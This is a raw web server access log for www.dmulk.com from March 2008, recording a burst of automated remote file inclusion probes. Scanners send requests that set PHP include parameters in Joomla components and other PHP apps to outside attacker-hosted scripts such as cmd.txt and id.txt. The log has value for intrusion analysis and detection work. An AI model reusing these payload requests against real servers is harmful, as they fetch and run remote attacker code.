69.10.154.114 - - [25/Mar/2008:08:58:44 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:58:44 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:08:58:46 -0700] "GET /logs/access_080313.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:08:58:46 -0700] "GET /index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:08:58:47 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:59:04 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:59:04 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:59:08 -0700] "GET /logs/access_080119.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:59:18 -0700] "GET /logs/access_080207.log/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:59:47 -0700] "GET /logs/access_080131.log//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:59:48 -0700] "GET //index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:59:49 -0700] "GET /logs/access_080312.log//?pag=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:08:59:50 -0700] "GET /logs//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:59:50 -0700] "GET /logs//?pag=http://netbr.org/documents/cmd.txt? HTTP/1.1" 200 40268 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:59:53 -0700] "GET //?pag=http://netbr.org/documents/cmd.txt? HTTP/1.0" 200 3078 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:09:00:13 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:09:00:13 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:09:00:13 -0700] "GET //Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:09:00:13 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:09:00:18 -0700] "GET /logs/access_080223.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:09:00:22 -0700] "GET /logs/access_080215.log//login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:00:30 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:00:30 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:00:30 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.53.252.56 - - [25/Mar/2008:09:00:36 -0700] "GET /logs/access_080225.loghttp://amyswedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:09:00:39 -0700] "GET /logs/access_080119.log//Neos_Chronos/header.php?base_folder=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:09:00:56 -0700] "GET /errors.php?error=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:09:00:56 -0700] "GET /logs/errors.php?error=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:00:59 -0700] "GET /logs/access_080312.log//config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:00 -0700] "GET //config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:00 -0700] "GET /logs//config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.53.252.56 - - [25/Mar/2008:09:01:01 -0700] "GET /logs/access_080225.loghttp://amyswedding.eclub.lv/images? HTTP/1.0" 404 275 "-" "Googlebot/2.0 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:03 -0700] "GET /logs/access_080312.log//index2.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:04 -0700] "GET //index2.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:04 -0700] "GET /logs//index2.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:01:22 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:23 -0700] "GET /logs/access_080312.log//admin.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:24 -0700] "GET //admin.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:24 -0700] "GET /logs//admin.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:44 -0700] "GET /logs/access_080312.log//index.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:44 -0700] "GET //index.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:01:44 -0700] "GET /logs//index.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:09:01:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:09:01:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.166.152.66 - - [25/Mar/2008:09:02:27 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [25/Mar/2008:09:02:28 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.166.152.66 - - [25/Mar/2008:09:02:28 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:09:02:56 -0700] "GET //index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.143.20 - - [25/Mar/2008:09:03:07 -0700] "GET //index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:09:03:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:03:22 -0700] "GET /logs/access_080131.log//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:03:24 -0700] "GET //index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:03:25 -0700] "GET /logs//index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.251.10 - - [25/Mar/2008:09:03:52 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.203.99.136 - - [25/Mar/2008:09:04:24 -0700] "GET /logs/access_080131.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:04:30 -0700] "GET /logs/access_080219.log/[Scriptftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:04:31 -0700] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:04:31 -0700] "GET /logs/[Scriptftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:04:35 -0700] "GET /logs/access_080223.log//config.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:04:37 -0700] "GET /logs/access_080223.log//index2.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:04:47 -0700] "GET /logs/access_080223.log//admin.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.48.74.30 - - [25/Mar/2008:09:04:47 -0700] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:05:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:05:05 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:05:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.199.35.158 - - [25/Mar/2008:09:05:13 -0700] "GET /?mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
82.199.35.158 - - [25/Mar/2008:09:05:13 -0700] "GET /logs/?mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 200 40263 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
203.72.181.15 - - [25/Mar/2008:09:05:21 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dfmuses.xpg.com.br/uses/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.86.83.83 - - [25/Mar/2008:09:05:27 -0700] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/idt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.83.83 - - [25/Mar/2008:09:05:27 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/idt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.83.83 - - [25/Mar/2008:09:05:28 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/idt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:09:05:30 -0700] "GET //index.php?pagina=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:09:05:36 -0700] "GET /logs/access_080223.log//index.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.204.230.31 - - [25/Mar/2008:09:06:03 -0700] "GET //login.php?dir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.47.82.13 - - [25/Mar/2008:09:06:07 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:09:06:24 -0700] "GET /logs/access_080207.log/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:06:39 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:09:06:39 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:06:55 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:06:56 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [25/Mar/2008:09:06:56 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.83.83 - - [25/Mar/2008:09:07:08 -0700] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://acme-superstore.com/mlm/idt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:09:07:22 -0700] "GET /logs/access_080215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [25/Mar/2008:09:07:24 -0700] "GET /logs/access_080207.log/index.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.192.123 - - [25/Mar/2008:09:07:28 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.7.192.123 - - [25/Mar/2008:09:07:30 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:09:07:35 -0700] "GET /logs/access_080312.log/[Scriptftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.131.61 - - [25/Mar/2008:09:08:34 -0700] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:09:08:43 -0700] "GET /logs/access_080215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:09:03 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:09:09:03 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.232.251.10 - - [25/Mar/2008:09:09:27 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:09:09:37 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.1.62.200 - - [25/Mar/2008:09:09:37 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:09:46 -0700] "GET /logs/access_080216.log/main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:09:46 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:09:09:47 -0700] "GET /logs/main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.36.241.244 - - [25/Mar/2008:09:09:55 -0700] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:03 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:04 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:04 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:09 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:10 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:09:10:10 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.120.48 - - [25/Mar/2008:09:10:36 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [25/Mar/2008:09:10:58 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [25/Mar/2008:09:10:58 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.149.108.250 - - [25/Mar/2008:09:10:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.manzoteam.it/millesimo/news/36.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:11:06 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:11:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:09:11:09 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.47.82.13 - - [25/Mar/2008:09:11:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
